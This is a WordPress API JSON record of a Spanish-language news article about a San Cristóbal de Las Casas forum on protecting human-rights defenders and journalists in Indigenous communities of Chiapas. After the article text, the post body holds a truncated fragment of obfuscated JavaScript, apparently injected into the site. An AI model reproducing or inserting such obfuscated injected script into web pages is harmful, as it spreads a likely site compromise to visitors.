{"id":9743,"date":"2023-04-26T04:15:23","date_gmt":"2023-04-26T04:15:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9743"},"modified":"2023-04-26T04:15:24","modified_gmt":"2023-04-26T04:15:24","slug":"se-realiza-foro-para-proteccion-de-periodistas-y-defensores-de-derechos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9743","title":{"rendered":"Se realiza foro para protecci\u00f3n de periodistas y defensores de derechos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"632\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-25-at-5.11.03-PM-1024x632.jpeg\" alt=\"\" class=\"wp-image-9744\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-25-at-5.11.03-PM-1024x632.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-25-at-5.11.03-PM-300x185.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-25-at-5.11.03-PM-768x474.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-25-at-5.11.03-PM.jpeg 1392w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>25 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Se realiz\u00f3 en esta ciudad el Foro Voces para la Protecci\u00f3n de Personas Defensoras de Derechos Humanos y Periodistas en las Comunidades Ind\u00edgenas de Chiapas, el cual tuvo la finalidad de poner los recursos con los que se cuentan, para mejorar las condiciones en las que personas defensoras y periodistas puedan llevar a cabo su labor.<\/p>\n\n\n\n<p>Al respecto, Juan Jos\u00e9 Berm\u00fadez Zepeda, presidente de la Comisi\u00f3n Estatal de los Derechos Humanos de Chiapas, se\u00f1al\u00f3 que esto marca el inicio de lo que ser\u00e1 una cooperaci\u00f3n s\u00f3lida y cercana para fortalecer las capacidades institucionales en materia de protecci\u00f3n en el estado.<\/p>\n\n\n\n<p>Coment\u00f3 que el Foro Voces por la Protecci\u00f3n de Personas Defensoras de Derechos Humanos y Periodistas en las Comunidades de Chiapas es un ejercicio serio y reafirma el compromiso de la Comisi\u00f3n Estatal de Derechos Humanos con la promoci\u00f3n y la protecci\u00f3n de las libertades fundamentales.<\/p>\n\n\n\n<p>\u201cEl foro est\u00e1 pensado y dise\u00f1ado con la intenci\u00f3n de constituir una instancia de di\u00e1logo, de intercambio de experiencias que nos permitan arribar a soluciones efectivas para remediar las problem\u00e1ticas que enfrentan las personas Defensoras de derechos humanos y periodistas, nos reunimos hoy a dialogar y reflexionar en todo los actores sociales cuyas actividades y funciones son indispensables para la vida pol\u00edtica social y cultural de cualquier pa\u00eds que se aprecie de ser respetuoso de las libertades fundamentales de manera concreta\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Por \u00faltimo, agreg\u00f3 que tanto el periodismo como la defensa de los derechos humanos son indispensables para el establecimiento y permanencia del estado constitucional y democr\u00e1tico de derecho, \u201cla defensa de las libertades fundamentales y el trabajo informativo de las personas periodistas precisan espacios seguros y libres de interferencias, no puede sobrevivir cuando se le pretende subordinar al poder, por el contrario, para que estos quehaceres cumplan con su prop\u00f3sito es preciso que las autoridades garanticen condiciones que sean favorables al libre y pleno ejercicio de las libertades esenciales\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 25 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Se realiz\u00f3 en esta ciudad el Foro Voces para la Protecci\u00f3n de Personas Defensoras de Derechos Humanos y Periodistas en las Comunidades Ind\u00edgenas de Chiapas, el cual tuvo la finalidad de poner los recursos con los que se cuentan, para mejorar las condiciones &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9744,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9743","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9743","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9743"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9743\/revisions"}],"predecessor-version":[{"id":9745,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9743\/revisions\/9745"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9744"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}